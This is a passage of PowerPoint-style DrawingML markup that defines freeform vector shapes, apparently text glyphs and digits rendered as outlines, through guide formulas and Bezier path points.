                <a:gd name="T25" fmla="*/ 197 h 336"/>
                <a:gd name="T26" fmla="*/ 88 w 237"/>
                <a:gd name="T27" fmla="*/ 197 h 336"/>
                <a:gd name="T28" fmla="*/ 73 w 237"/>
                <a:gd name="T29" fmla="*/ 196 h 336"/>
                <a:gd name="T30" fmla="*/ 53 w 237"/>
                <a:gd name="T31" fmla="*/ 186 h 336"/>
                <a:gd name="T32" fmla="*/ 45 w 237"/>
                <a:gd name="T33" fmla="*/ 165 h 336"/>
                <a:gd name="T34" fmla="*/ 51 w 237"/>
                <a:gd name="T35" fmla="*/ 142 h 336"/>
                <a:gd name="T36" fmla="*/ 100 w 237"/>
                <a:gd name="T37" fmla="*/ 158 h 336"/>
                <a:gd name="T38" fmla="*/ 180 w 237"/>
                <a:gd name="T39" fmla="*/ 80 h 336"/>
                <a:gd name="T40" fmla="*/ 164 w 237"/>
                <a:gd name="T41" fmla="*/ 33 h 336"/>
                <a:gd name="T42" fmla="*/ 206 w 237"/>
                <a:gd name="T43" fmla="*/ 21 h 336"/>
                <a:gd name="T44" fmla="*/ 222 w 237"/>
                <a:gd name="T45" fmla="*/ 39 h 336"/>
                <a:gd name="T46" fmla="*/ 237 w 237"/>
                <a:gd name="T47" fmla="*/ 23 h 336"/>
                <a:gd name="T48" fmla="*/ 155 w 237"/>
                <a:gd name="T49" fmla="*/ 80 h 336"/>
                <a:gd name="T50" fmla="*/ 100 w 237"/>
                <a:gd name="T51" fmla="*/ 137 h 336"/>
                <a:gd name="T52" fmla="*/ 45 w 237"/>
                <a:gd name="T53" fmla="*/ 81 h 336"/>
                <a:gd name="T54" fmla="*/ 100 w 237"/>
                <a:gd name="T55" fmla="*/ 23 h 336"/>
                <a:gd name="T56" fmla="*/ 155 w 237"/>
                <a:gd name="T57" fmla="*/ 80 h 336"/>
                <a:gd name="T58" fmla="*/ 210 w 237"/>
                <a:gd name="T59" fmla="*/ 265 h 336"/>
                <a:gd name="T60" fmla="*/ 115 w 237"/>
                <a:gd name="T61" fmla="*/ 315 h 336"/>
                <a:gd name="T62" fmla="*/ 20 w 237"/>
                <a:gd name="T63" fmla="*/ 265 h 336"/>
                <a:gd name="T64" fmla="*/ 43 w 237"/>
                <a:gd name="T65" fmla="*/ 225 h 336"/>
                <a:gd name="T66" fmla="*/ 101 w 237"/>
                <a:gd name="T67" fmla="*/ 216 h 336"/>
                <a:gd name="T68" fmla="*/ 210 w 237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6">
                  <a:moveTo>
                    <a:pt x="237" y="23"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="13"/>
                    <a:pt x="228" y="0"/>
                    <a:pt x="205" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="0"/>
                    <a:pt x="175" y="1"/>
                    <a:pt x="150" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="12"/>
                    <a:pt x="122" y="3"/>
                    <a:pt x="100" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="3"/>
                    <a:pt x="20" y="39"/>
                    <a:pt x="20" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="101"/>
                    <a:pt x="28" y="116"/>
                    <a:pt x="38" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="139"/>
                    <a:pt x="26" y="150"/>
                    <a:pt x="26" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="181"/>
                    <a:pt x="33" y="192"/>
                    <a:pt x="41" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="227"/>
                    <a:pt x="0" y="260"/>
                    <a:pt x="0" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="307"/>
                    <a:pt x="52" y="336"/>
                    <a:pt x="115" y="336"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="336"/>
                    <a:pt x="230" y="307"/>
                    <a:pt x="230" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="248"/>
                    <a:pt x="221" y="224"/>
                    <a:pt x="197" y="211"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="207"/>
                    <a:pt x="170" y="197"/>
                    <a:pt x="125" y="197"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="88" y="197"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="197"/>
                    <a:pt x="77" y="196"/>
                    <a:pt x="73" y="196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="196"/>
                    <a:pt x="60" y="195"/>
                    <a:pt x="53" y="186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="178"/>
                    <a:pt x="45" y="165"/>
                    <a:pt x="45" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="162"/>
                    <a:pt x="47" y="154"/>
                    <a:pt x="51" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="147"/>
                    <a:pt x="76" y="158"/>
                    <a:pt x="100" y="158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="158"/>
                    <a:pt x="180" y="123"/>
                    <a:pt x="180" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="66"/>
                    <a:pt x="175" y="52"/>
                    <a:pt x="164" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="24"/>
                    <a:pt x="194" y="22"/>
                    <a:pt x="206" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="36"/>
                    <a:pt x="218" y="39"/>
                    <a:pt x="222" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="39"/>
                    <a:pt x="237" y="34"/>
                    <a:pt x="237" y="23"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="155" y="80"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="112"/>
                    <a:pt x="129" y="137"/>
                    <a:pt x="100" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="137"/>
                    <a:pt x="45" y="110"/>
                    <a:pt x="45" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="48"/>
                    <a:pt x="70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89"/>
                    <a:pt x="170" y="315"/>
                    <a:pt x="115" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="315"/>
                    <a:pt x="20" y="289"/>
                    <a:pt x="20" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="255"/>
                    <a:pt x="25" y="236"/>
                    <a:pt x="43" y="225"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="216"/>
                    <a:pt x="62" y="216"/>
                    <a:pt x="101" y="216"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="216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4" name="Freeform 1120">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88F50707-7D31-4AF4-8F37-9AFB8A8A36B3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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2705100" y="1362075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5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5" name="Freeform 1121">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E405DB4E-BB21-40EC-8326-FF059137DE09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798762" y="1339850"/>
              <a:ext cx="80963" cy="107950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3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49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8" y="279"/>
                    <a:pt x="133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6" name="Freeform 1122">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DA9EA20-6CE9-4003-B6BA-B7B266C339FA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3003550" y="136207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3" y="86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7" name="Freeform 1123">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2850B1B2-25EE-4A65-BE99-99B8DA0AAB7B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3101975" y="1328738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8" name="Freeform 1124">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF0C66BD-4D0E-44C6-921F-670F05F8C902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3201987" y="1328738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5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7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1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5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7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0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9" name="Freeform 1125">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77CE281F-CD58-4414-9BC7-35EA73687C49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302000" y="1363663"/>
              <a:ext cx="85725" cy="84138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0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8" y="50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4"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="88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0" name="Freeform 1126">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28DF5848-71D6-49A3-92DC-BA22BBBB9B11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3405187" y="1362075"/>
              <a:ext cx="77788" cy="85725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1" name="Freeform 1127">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3773BD2F-E2A4-4918-9271-9646AAEDAA7D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509962" y="1362075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0 w 189"/>
                <a:gd name="T3" fmla="*/ 95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0 w 189"/>
                <a:gd name="T13" fmla="*/ 68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5"/>
                    <a:pt x="152" y="68"/>
                    <a:pt x="160" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="68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2" name="Freeform 1128">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{192E958E-CDA4-48FC-B641-75D4A7943622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3609975" y="1362075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3" name="Freeform 1129">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85A46C40-EF0C-49DB-A8F0-8D01FCE756B8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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3735387" y="1365250"/>
              <a:ext cx="20638" cy="82550"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 54 w 54"/>
                <a:gd name="T1" fmla="*/ 27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7 w 54"/>
                <a:gd name="T13" fmla="*/ 157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7"/>
                    <a:pt x="27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3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4" name="Freeform 1130">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E6D9441-A83D-4F5D-9BD6-00A2BD26614C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4005262" y="1327150"/>
              <a:ext cx="79375" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 208 w 208"/>
                <a:gd name="T1" fmla="*/ 158 h 315"/>
                <a:gd name="T2" fmla="*/ 104 w 208"/>
                <a:gd name="T3" fmla="*/ 0 h 315"/>
                <a:gd name="T4" fmla="*/ 0 w 208"/>
                <a:gd name="T5" fmla="*/ 157 h 315"/>
                <a:gd name="T6" fmla="*/ 104 w 208"/>
                <a:gd name="T7" fmla="*/ 315 h 315"/>
                <a:gd name="T8" fmla="*/ 208 w 208"/>
                <a:gd name="T9" fmla="*/ 158 h 315"/>
                <a:gd name="T10" fmla="*/ 183 w 208"/>
                <a:gd name="T11" fmla="*/ 152 h 315"/>
                <a:gd name="T12" fmla="*/ 104 w 208"/>
                <a:gd name="T13" fmla="*/ 294 h 315"/>
                <a:gd name="T14" fmla="*/ 25 w 208"/>
                <a:gd name="T15" fmla="*/ 152 h 315"/>
                <a:gd name="T16" fmla="*/ 104 w 208"/>
                <a:gd name="T17" fmla="*/ 20 h 315"/>
                <a:gd name="T18" fmla="*/ 183 w 208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5">
                  <a:moveTo>
                    <a:pt x="208" y="158"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="65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49"/>
                    <a:pt x="49" y="315"/>
                    <a:pt x="104" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="315"/>
                    <a:pt x="208" y="248"/>
                    <a:pt x="208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2" y="294"/>
                    <a:pt x="25" y="232"/>
                    <a:pt x="25" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="73"/>
                    <a:pt x="64" y="20"/>
                    <a:pt x="104" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="20"/>
                    <a:pt x="183" y="72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5" name="Freeform 1131">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12D048D4-A4C9-4489-A83B-7C4DBDA3BD56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4100512" y="1365250"/>
              <a:ext cx="88900" cy="82550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3 w 232"/>
                <a:gd name="T5" fmla="*/ 191 h 212"/>
                <a:gd name="T6" fmla="*/ 126 w 232"/>
                <a:gd name="T7" fmla="*/ 102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9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8 h 212"/>
                <a:gd name="T24" fmla="*/ 66 w 232"/>
                <a:gd name="T25" fmla="*/ 21 h 212"/>
                <a:gd name="T26" fmla="*/ 96 w 232"/>
                <a:gd name="T27" fmla="*/ 10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2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1 h 212"/>
                <a:gd name="T52" fmla="*/ 61 w 232"/>
                <a:gd name="T53" fmla="*/ 191 h 212"/>
                <a:gd name="T54" fmla="*/ 115 w 232"/>
                <a:gd name="T55" fmla="*/ 115 h 212"/>
                <a:gd name="T56" fmla="*/ 171 w 232"/>
                <a:gd name="T57" fmla="*/ 191 h 212"/>
                <a:gd name="T58" fmla="*/ 141 w 232"/>
                <a:gd name="T59" fmla="*/ 201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6" y="102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9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3" y="21"/>
                    <a:pt x="163" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="88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0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2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5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171" y="191"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="191"/>
                    <a:pt x="141" y="191"/>
                    <a:pt x="141" y="201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141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6" name="Freeform 1132">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3188C5D0-AC70-423B-A6E1-3AE6C08A1DAA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4216400" y="1327150"/>
              <a:ext cx="63500" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 164 w 164"/>
                <a:gd name="T1" fmla="*/ 299 h 310"/>
                <a:gd name="T2" fmla="*/ 148 w 164"/>
                <a:gd name="T3" fmla="*/ 289 h 310"/>
                <a:gd name="T4" fmla="*/ 96 w 164"/>
                <a:gd name="T5" fmla="*/ 289 h 310"/>
                <a:gd name="T6" fmla="*/ 96 w 164"/>
                <a:gd name="T7" fmla="*/ 15 h 310"/>
                <a:gd name="T8" fmla="*/ 86 w 164"/>
                <a:gd name="T9" fmla="*/ 0 h 310"/>
                <a:gd name="T10" fmla="*/ 77 w 164"/>
                <a:gd name="T11" fmla="*/ 5 h 310"/>
                <a:gd name="T12" fmla="*/ 9 w 164"/>
                <a:gd name="T13" fmla="*/ 63 h 310"/>
                <a:gd name="T14" fmla="*/ 0 w 164"/>
                <a:gd name="T15" fmla="*/ 73 h 310"/>
                <a:gd name="T16" fmla="*/ 12 w 164"/>
                <a:gd name="T17" fmla="*/ 83 h 310"/>
                <a:gd name="T18" fmla="*/ 71 w 164"/>
                <a:gd name="T19" fmla="*/ 54 h 310"/>
                <a:gd name="T20" fmla="*/ 71 w 164"/>
                <a:gd name="T21" fmla="*/ 289 h 310"/>
                <a:gd name="T22" fmla="*/ 19 w 164"/>
                <a:gd name="T23" fmla="*/ 289 h 310"/>
                <a:gd name="T24" fmla="*/ 3 w 164"/>
                <a:gd name="T25" fmla="*/ 299 h 310"/>
                <a:gd name="T26" fmla="*/ 19 w 164"/>
                <a:gd name="T27" fmla="*/ 310 h 310"/>
                <a:gd name="T28" fmla="*/ 148 w 164"/>
                <a:gd name="T29" fmla="*/ 310 h 310"/>
                <a:gd name="T30" fmla="*/ 164 w 164"/>
                <a:gd name="T31" fmla="*/ 29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0">
                  <a:moveTo>
                    <a:pt x="164" y="299"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="164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5"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="9"/>
                    <a:pt x="96" y="0"/>
                    <a:pt x="86" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="0"/>
                    <a:pt x="78" y="2"/>
                    <a:pt x="77" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="55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7" y="83"/>
                    <a:pt x="12" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="83"/>
                    <a:pt x="41" y="80"/>
                    <a:pt x="71" y="54"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="71" y="289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="289"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="289"/>
                    <a:pt x="3" y="289"/>
                    <a:pt x="3" y="299"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="310"/>
                    <a:pt x="13" y="310"/>
                    <a:pt x="19" y="310"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="148" y="310"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="310"/>
                    <a:pt x="164" y="310"/>
                    <a:pt x="164" y="2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7" name="Freeform 1133">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBBAC163-27EE-4396-A3E1-95206D140E2F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4316412" y="1327150"/>
              <a:ext cx="63500" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 163 w 163"/>
                <a:gd name="T1" fmla="*/ 299 h 310"/>
                <a:gd name="T2" fmla="*/ 148 w 163"/>
                <a:gd name="T3" fmla="*/ 289 h 310"/>
                <a:gd name="T4" fmla="*/ 96 w 163"/>
                <a:gd name="T5" fmla="*/ 289 h 310"/>
                <a:gd name="T6" fmla="*/ 96 w 163"/>
                <a:gd name="T7" fmla="*/ 15 h 310"/>
                <a:gd name="T8" fmla="*/ 86 w 163"/>
                <a:gd name="T9" fmla="*/ 0 h 310"/>
                <a:gd name="T10" fmla="*/ 76 w 163"/>
                <a:gd name="T11" fmla="*/ 5 h 310"/>
                <a:gd name="T12" fmla="*/ 9 w 163"/>
                <a:gd name="T13" fmla="*/ 63 h 310"/>
                <a:gd name="T14" fmla="*/ 0 w 163"/>
                <a:gd name="T15" fmla="*/ 73 h 310"/>
                <a:gd name="T16" fmla="*/ 12 w 163"/>
                <a:gd name="T17" fmla="*/ 83 h 310"/>
                <a:gd name="T18" fmla="*/ 71 w 163"/>
                <a:gd name="T19" fmla="*/ 54 h 310"/>
                <a:gd name="T20" fmla="*/ 71 w 163"/>
                <a:gd name="T21" fmla="*/ 289 h 310"/>
                <a:gd name="T22" fmla="*/ 18 w 163"/>
                <a:gd name="T23" fmla="*/ 289 h 310"/>
                <a:gd name="T24" fmla="*/ 3 w 163"/>
                <a:gd name="T25" fmla="*/ 299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29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299"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="163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5"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="9"/>
                    <a:pt x="96" y="0"/>
                    <a:pt x="86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54" y="55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3"/>
                    <a:pt x="12" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="83"/>
                    <a:pt x="41" y="80"/>
                    <a:pt x="71" y="54"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="71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299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2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8" name="Freeform 1134">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7A1948D-909B-4532-91D7-D2527016D007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4406900" y="1327150"/>
              <a:ext cx="77788" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 206 w 206"/>
                <a:gd name="T1" fmla="*/ 294 h 310"/>
                <a:gd name="T2" fmla="*/ 206 w 206"/>
                <a:gd name="T3" fmla="*/ 280 h 310"/>
                <a:gd name="T4" fmla="*/ 194 w 206"/>
                <a:gd name="T5" fmla="*/ 264 h 310"/>
                <a:gd name="T6" fmla="*/ 181 w 206"/>
                <a:gd name="T7" fmla="*/ 289 h 310"/>
                <a:gd name="T8" fmla="*/ 39 w 206"/>
                <a:gd name="T9" fmla="*/ 289 h 310"/>
                <a:gd name="T10" fmla="*/ 162 w 206"/>
                <a:gd name="T11" fmla="*/ 185 h 310"/>
                <a:gd name="T12" fmla="*/ 206 w 206"/>
                <a:gd name="T13" fmla="*/ 95 h 310"/>
                <a:gd name="T14" fmla="*/ 97 w 206"/>
                <a:gd name="T15" fmla="*/ 0 h 310"/>
                <a:gd name="T16" fmla="*/ 0 w 206"/>
                <a:gd name="T17" fmla="*/ 80 h 310"/>
                <a:gd name="T18" fmla="*/ 18 w 206"/>
                <a:gd name="T19" fmla="*/ 100 h 310"/>
                <a:gd name="T20" fmla="*/ 36 w 206"/>
                <a:gd name="T21" fmla="*/ 82 h 310"/>
                <a:gd name="T22" fmla="*/ 27 w 206"/>
                <a:gd name="T23" fmla="*/ 67 h 310"/>
                <a:gd name="T24" fmla="*/ 94 w 206"/>
                <a:gd name="T25" fmla="*/ 20 h 310"/>
                <a:gd name="T26" fmla="*/ 181 w 206"/>
                <a:gd name="T27" fmla="*/ 95 h 310"/>
                <a:gd name="T28" fmla="*/ 120 w 206"/>
                <a:gd name="T29" fmla="*/ 193 h 310"/>
                <a:gd name="T30" fmla="*/ 6 w 206"/>
                <a:gd name="T31" fmla="*/ 289 h 310"/>
                <a:gd name="T32" fmla="*/ 0 w 206"/>
                <a:gd name="T33" fmla="*/ 299 h 310"/>
                <a:gd name="T34" fmla="*/ 16 w 206"/>
                <a:gd name="T35" fmla="*/ 310 h 310"/>
                <a:gd name="T36" fmla="*/ 191 w 206"/>
                <a:gd name="T37" fmla="*/ 310 h 310"/>
                <a:gd name="T38" fmla="*/ 206 w 206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310">
                  <a:moveTo>
                    <a:pt x="206" y="294"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="206" y="280"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="273"/>
                    <a:pt x="206" y="264"/>
                    <a:pt x="194" y="264"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="264"/>
                    <a:pt x="181" y="272"/>
                    <a:pt x="181" y="289"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="39" y="289"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="253"/>
                    <a:pt x="130" y="214"/>
                    <a:pt x="162" y="185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="159"/>
                    <a:pt x="206" y="130"/>
                    <a:pt x="206" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="36"/>
                    <a:pt x="157" y="0"/>
                    <a:pt x="97" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="0"/>
                    <a:pt x="0" y="39"/>
                    <a:pt x="0" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="95"/>
                    <a:pt x="11" y="100"/>
                    <a:pt x="18" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="100"/>
                    <a:pt x="36" y="93"/>
                    <a:pt x="36" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="77"/>
                    <a:pt x="34" y="72"/>
                    <a:pt x="27" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="38"/>
                    <a:pt x="63" y="20"/>
                    <a:pt x="94" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="20"/>
                    <a:pt x="181" y="46"/>
                    <a:pt x="181" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="132"/>
                    <a:pt x="155" y="164"/>
                    <a:pt x="120" y="193"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6" y="289"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="292"/>
                    <a:pt x="0" y="294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3" y="310"/>
                    <a:pt x="206" y="306"/>
                    <a:pt x="206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9" name="Freeform 1135">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{773DD6BF-8F03-4933-82AA-5C2CD3B1042B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4506912" y="1327150"/>
              <a:ext cx="77788" cy="120650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0 h 310"/>
                <a:gd name="T4" fmla="*/ 194 w 207"/>
                <a:gd name="T5" fmla="*/ 264 h 310"/>
                <a:gd name="T6" fmla="*/ 181 w 207"/>
                <a:gd name="T7" fmla="*/ 289 h 310"/>
                <a:gd name="T8" fmla="*/ 40 w 207"/>
                <a:gd name="T9" fmla="*/ 289 h 310"/>
                <a:gd name="T10" fmla="*/ 162 w 207"/>
                <a:gd name="T11" fmla="*/ 185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0 h 310"/>
                <a:gd name="T18" fmla="*/ 18 w 207"/>
                <a:gd name="T19" fmla="*/ 100 h 310"/>
                <a:gd name="T20" fmla="*/ 36 w 207"/>
                <a:gd name="T21" fmla="*/ 82 h 310"/>
                <a:gd name="T22" fmla="*/ 28 w 207"/>
                <a:gd name="T23" fmla="*/ 67 h 310"/>
                <a:gd name="T24" fmla="*/ 94 w 207"/>
                <a:gd name="T25" fmla="*/ 20 h 310"/>
                <a:gd name="T26" fmla="*/ 181 w 207"/>
                <a:gd name="T27" fmla="*/ 95 h 310"/>
                <a:gd name="T28" fmla="*/ 120 w 207"/>
                <a:gd name="T29" fmla="*/ 193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0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="273"/>
                    <a:pt x="207" y="264"/>
                    <a:pt x="194" y="264"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="264"/>
                    <a:pt x="181" y="272"/>
                    <a:pt x="181" y="289"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="40" y="289"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="253"/>
                    <a:pt x="130" y="214"/>
                    <a:pt x="162" y="185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="159"/>
                    <a:pt x="207" y="130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0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="95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7"/>
                    <a:pt x="34" y="72"/>
                    <a:pt x="28" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="38"/>
                    <a:pt x="64" y="20"/>
                    <a:pt x="94" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="20"/>
                    <a:pt x="181" y="46"/>
                    <a:pt x="181" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="132"/>
                    <a:pt x="156" y="164"/>
                    <a:pt x="120" y="193"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6" y="289"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="292"/>
                    <a:pt x="0" y="294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4" y="310"/>
                    <a:pt x="207" y="306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0" name="Freeform 1136">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FFC29FE-0107-4AFD-A519-07EA9FBE619E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4605337" y="1327150"/>
              <a:ext cx="82550" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
